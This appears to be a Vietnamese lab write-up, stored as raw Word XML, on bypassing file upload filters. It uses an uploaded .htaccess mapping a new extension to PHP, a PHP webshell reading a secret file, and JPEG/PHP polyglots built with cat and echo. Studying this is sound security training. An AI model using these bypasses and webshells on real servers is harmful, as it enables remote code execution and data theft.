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561CE" w14:textId="4778C442" w:rsidR="002F49FE" w:rsidRPr="00854C2A" w:rsidRDefault="00D971E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00854C2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 1: Chỉnh sửa cấu hình để upload file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0DFFAC" w14:textId="571678AC" w:rsidR="00D971E4" w:rsidRDefault="00D971E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14203CD2" w14:textId="3460C057" w:rsidR="00D971E4" w:rsidRDefault="00D971E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài này không khó nhưng lạ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBFA0E5" w14:textId="645F2D21" w:rsidR="00D971E4" w:rsidRDefault="00D971E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình thử tải lên tập tin php nhưng không được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32533C35" w14:textId="14F5C127" w:rsidR="00D971E4" w:rsidRDefault="00D971E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nhưng biết máy chủ web là apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FFB921" w14:textId="027C5BF4" w:rsidR="00D971E4" w:rsidRDefault="00D971E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Hướng giải bài này là phải ghi đè cấu hình </w:t>
      </w:r>
      <w:r w:rsidR="00575482">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>của máy chủ để tải được file php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E04613" w14:textId="11323087" w:rsidR="00C041FF" w:rsidRDefault="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Với máy chủ apache sẽ cho phép tải tập tin .htaccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C5E4B" w14:textId="373A4661" w:rsidR="00C041FF" w:rsidRDefault="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AAB6A0" w14:textId="10E3F87B" w:rsidR="00C041FF" w:rsidRDefault="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>filename=”.htaccess”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB19803" w14:textId="4081CAAB" w:rsidR="00575482" w:rsidRDefault="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content-type: text/plain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA63696" w14:textId="29CBFC7C" w:rsidR="00C041FF" w:rsidRDefault="00C041FF" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nội dung: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C041FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AddType application/x-httpd-php .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>123t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A1DEDE" w14:textId="09EF9882" w:rsidR="00C041FF" w:rsidRDefault="00C041FF" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47BA6CFF" w14:textId="294B6120" w:rsidR="00C041FF" w:rsidRDefault="00C041FF" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vì phần mở rộng .php đã bị cấm, mình chỉ có thể thêm phần mở rộng mới là .123t để kích hoạt file php</w:t>
      </w:r>
      <w:r w:rsidR="00854C2A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD9CBD6" w14:textId="7D6DA7F5" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D14C53" w14:textId="1EED1E68" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rồi upload webshell.123t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B44D88" w14:textId="140F16AA" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content-type: text/php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF548FC" w14:textId="77777777" w:rsidR="00854C2A" w:rsidRPr="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00854C2A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nội dung: </w:t>
      </w:r>
      <w:r w:rsidRPr="00854C2A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?php echo file_get_contents('/home/carlos/secret'); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E54490" w14:textId="054D8456" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DA8F71" w14:textId="3920378E" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00854C2A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24000606" w14:textId="2FF3D9F0" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38FCAA26" w14:textId="449436BB" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00854C2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 2: Tải tập tin Polygot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0504874B" w14:textId="19C6F62E" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524A4A59" w14:textId="77777777" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài này xác thực dựa trên nội dung tập tin. Chúng ta không thể up file php được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF0374" w14:textId="6F5AA6D1" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Để giải được bài toán này,ta phải nhúng file php trong  jpeg hay còn gọi là polygot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BE93D8" w14:textId="413A78F2" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3EAD95" w14:textId="4E221149" w:rsidR="00854C2A" w:rsidRDefault="00854C2A" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Cách </w:t>
      </w:r>
      <w:r w:rsidR="00476D85">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70076C9E" w14:textId="7844D9FE" w:rsidR="00854C2A" w:rsidRDefault="00865FBC" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rabbit.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046BDBE4" w14:textId="48CFA5DA" w:rsidR="00865FBC" w:rsidRDefault="00865FBC" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>webshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A679C" w14:textId="0BFE01B4" w:rsidR="00865FBC" w:rsidRDefault="00865FBC" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat rabbit</w:t>
      </w:r>
      <w:r w:rsidR="00C2516C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jpg webshell.php &gt; rab.jpg (thành công)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A940440" w14:textId="0B73C506" w:rsidR="00476D85" w:rsidRDefault="00476D85" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735A2C60" w14:textId="6060C89C" w:rsidR="00476D85" w:rsidRDefault="00476D85" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Cách 2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCEB6D" w14:textId="0E8F26B1" w:rsidR="00476D85" w:rsidRDefault="00476D85" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476D85">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo '&lt;?php phpinfo(); ?&gt;' &gt;&gt; nasa.png &amp;&amp; mv nasa.png nasa.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A12C72D" w14:textId="3D70080D" w:rsidR="00865FBC" w:rsidRDefault="00865FBC" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF1BA8F" w14:textId="70739977" w:rsidR="00865FBC" w:rsidRDefault="00865FBC" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Để kích hoạt được tập tin này, phải đổi phần mở rộng là .php </w:t>
      </w:r>
      <w:r w:rsidRPr="00865FBC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rab.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69960C26" w14:textId="1DD36DCF" w:rsidR="00865FBC" w:rsidRDefault="00865FBC" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vì nó chỉ xác định loại file dựa trên nội dung nên vẫn up được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5328502D" w14:textId="4C98AE1B" w:rsidR="00865FBC" w:rsidRDefault="00865FBC" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185C20E5" w14:textId="2F6026E2" w:rsidR="00865FBC" w:rsidRPr="00854C2A" w:rsidRDefault="00865FBC" w:rsidP="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nhưng với DVWA, nó xác thực dựa trên nội dung file và phần mở rộng nên không kích hoạt được mã lệnh. Với cách làm đó ,nhưng tên file phải là rab.php.jpeg. Sau đó tìm lỗi command injection, đổi tên file thành rab.php mới kích hoạt được </w:t>
      </w:r>
      <w:r w:rsidRPr="00865FBC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E48E015" w14:textId="3F88F734" w:rsidR="00C041FF" w:rsidRPr="00D971E4" w:rsidRDefault="00C041FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C041FF" w:rsidRPr="00D971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41"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00476D85"/>
    <w:rsid w:val="00575482"/>
    <w:rsid w:val="00750441"/>
    <w:rsid w:val="00854C2A"/>
    <w:rsid w:val="00865FBC"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C041FF"/>
    <w:rsid w:val="00C2516C"/>
    <w:rsid w:val="00D971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D41F056"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{90F480EC-B7DC-4C41-8CBE-FB7BBE7E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character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C041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260631">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="17656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2022-10-28T15:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-01T14:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>